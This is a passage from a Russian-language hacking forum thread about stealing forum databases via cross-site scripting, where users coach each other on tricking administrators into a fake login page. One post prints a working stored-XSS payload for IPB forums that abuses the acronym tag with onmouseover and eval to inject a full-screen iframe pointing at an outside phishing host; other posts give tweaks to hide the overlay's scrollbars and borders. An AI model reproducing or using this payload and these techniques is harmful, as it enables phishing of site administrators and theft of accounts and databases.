Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 03.06.2010, 19:53   #16
 Разведчик
Аватар для towner
 
towner никому не известный тип
Регистрация: 20.01.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Кста, не обязательно писать в личку админу, достаточно оставить сообщение в теме, в которую админ заходит, и когда он её откроет его перекинет на фейк.Лично я оставил пост в новостях
 
Старый 03.06.2010, 20:11   #17
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Об этом я знаю, кстати если в подписе нельзя вставить код то можно вставить в сообщение (ЛС)
 
Старый 03.06.2010, 20:14   #18
Заблокирован
 Разведчик
Аватар для samyrai5
 
samyrai5 на правильном путиsamyrai5 на правильном пути
Регистрация: 02.06.2010
Сообщений: 27
Популярность: 150
Сказал(а) спасибо: 121
Поблагодарили 70 раз(а) в 52 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?
 
Старый 03.06.2010, 20:20   #19
Заблокирован
 Сержант
Аватар для [Tiger]
 
[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе[Tiger] лучик света в грозовом небе
Регистрация: 23.07.2009
Сообщений: 124
Популярность: 840
Сказал(а) спасибо: 170
Поблагодарили 383 раз(а) в 160 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от samyrai5Посмотреть сообщение
вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?

он должен его ввести туда=))
 
Старый 03.06.2010, 20:35   #20
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от samyrai5Посмотреть сообщение
вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?

ты кидаешь ему лс, он заходит в него и его автоматичекски кидает на фейк, адрес остаеться такой же но страница фейковая
 
Старый 03.06.2010, 21:46   #21
-= Элитный Читер =-
 Старший сержант
Аватар для pickwick
 
pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(
Регистрация: 17.04.2009
Сообщений: 194
Популярность: 13381
Золото Zhyk.Ru: 100
Сказал(а) спасибо: 251
Поблагодарили 330 раз(а) в 112 сообщениях
Отправить сообщение для pickwick с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные пользователи. ]
Пасс: zhyk.ru
автор monk
________________
Подполье по Lineage 2 теперь стало доступнее
 
Старый 04.06.2010, 00:19   #22
 Разведчик
Аватар для MAXIMICH
 
MAXIMICH никому не известный тип
Регистрация: 21.05.2009
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)
 
Старый 04.06.2010, 00:36   #23
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

+время убирайте,т.к оно на месте остается...
 
Старый 04.06.2010, 06:15   #24
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от Jumper_UAПосмотреть сообщение
я то не против насчет темки, но все таки задумался...
Жук говорил, что он против того чтобы на ЖУКЕ (для этого есть дарквеб - проект жука №2) выкладывали всевозможные уязвимости форумов или взломов. Так как это не баг игры, а баг конкретного движка. Т.Е. КАК можно быть против выкладывания сплоитов и всевозможных багов форумов или просто сайтов и в это время самому контролировать чтобы их все таки выкладывали?)

кто не понял - пропустите мимо ушей! еще раз говорю, тема стоящая, НО это не относится к ла2, разве только что БД слить, и то это можно отнести не только к БД ла2, а к другой БД.

Я просто про то говорю, что либо выкладывать и ничего не говорить, либо не выкладывать вообще и тогда можно говорить что форум не относится к взломам других сайтов или форумов.

кто прочитал - молодец! и он потратил минуту своей жизни на лабуду

Жук, скартезе и т.д. говорили мне выложить лучше на ДВ. Но думаешь там бы его заметили? Он бы остался незамеченным, как иголка в стоге сена.


Цитата:
Сообщение от MAXIMICHПосмотреть сообщение
А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)

в коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768 белых полосок должно быть невидно

и попробуй вместо x20scrolling=no на x20scrolling=yes
 
Старый 04.06.2010, 06:39   #25
Читер-спонсор
 Старший сержант
Аватар для Fix
 
Fix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компании
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Отправить сообщение для Fix с помощью ICQ Отправить сообщение для Fix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от MAXIMICHПосмотреть сообщение
А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)

В скролле пишеш=no - горизонтальный скролл.

какие такие полоски ?
________________

Последний раз редактировалось Fix; 04.06.2010 в 10:43. Причина: Уг ошибка(
 
Старый 04.06.2010, 10:18   #26
 Разведчик
Аватар для MAXIMICH
 
MAXIMICH никому не известный тип
Регистрация: 21.05.2009
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
В первом скролле пишеш =yes - вертикальный скролл;
Во втором - горизонтальный скролл.

Так в коде только 1 скролл x20scrolling )
 
Старый 04.06.2010, 10:56   #27
 Разведчик
Аватар для SnOoPKa
 
SnOoPKa никому не известный тип
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Проделываю все как показанно в видео уроке, но при вставке кода XSS в пдпись... в подписи нечего не высвечивается что делать? Подскажите плиз! Значит у меня на форуме такое не работает ?
 
Старый 04.06.2010, 11:00   #28
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

ссылка на форум кинь
 
Старый 04.06.2010, 11:06   #29
 Разведчик
Аватар для SnOoPKa
 
SnOoPKa никому не известный тип
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
Unhappy Re: Взлом БД через форум с xss

[Ссылки могут видеть только зарегистрированные пользователи. ] Получается вот так [Ссылки могут видеть только зарегистрированные пользователи. ]


PHP код:
[acronym=test1[acronym=test2 onmouseoverlol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://palacheldar.hut2.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color

Последний раз редактировалось SnOoPKa; 04.06.2010 в 11:20.
 
Старый 04.06.2010, 11:44   #30
-= Элитный Читер =-
 Старший сержант
Аватар для pickwick
 
pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(pickwick сломал счётчик популярности :(
Регистрация: 17.04.2009
Сообщений: 194
Популярность: 13381
Золото Zhyk.Ru: 100
Сказал(а) спасибо: 251
Поблагодарили 330 раз(а) в 112 сообщениях
Отправить сообщение для pickwick с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

При виде вот такого окошечка для вxода и регистрации, можете быть уверенными там работать не будет, т.к. это новая версия ipb и тег акроним там отключен.
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
2 пользователя(ей) сказали cпасибо:
m0nk (04.06.2010), ProTocoL (30.06.2010)
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 02:23.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net